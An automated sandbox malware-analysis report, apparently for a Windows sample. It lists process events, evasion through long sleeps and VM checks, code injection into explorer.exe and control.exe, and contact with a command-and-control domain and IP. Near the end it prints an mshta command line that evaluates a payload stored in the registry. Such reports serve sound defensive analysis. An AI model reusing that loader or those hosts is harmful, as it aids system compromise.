Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5444 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3144 Thread sleep count: 3957 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3144 Thread sleep count: 4963 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4960 Thread sleep time: -9223372036854770s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jdlmh2q4.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\w34iw342.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yg5i0oy3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4z2qptpk.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2882 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6491 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3957
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4963
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 0000001A.00000000.574145790.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000000.506175893.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000001A.00000000.544399258.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000000.574145790.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000001A.00000000.544399258.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: mshta.exe, 00000015.00000002.496071849.000001752B919000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
Source: explorer.exe, 0000001A.00000000.574145790.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: mshta.exe, 0000000F.00000002.464472467.000001F6467F4000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}_

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: init.icecreambob.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 194.147.86.221 80 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6614C12E0 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: AA0000 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6614C12E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6614C12E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: D70000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6614C12E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 92E000 Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: AA0000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: D70000 protect: page execute and read and write Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 92E000 value: 00 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 2988 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 6268 Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 8DCB1580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 8DCB1580
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
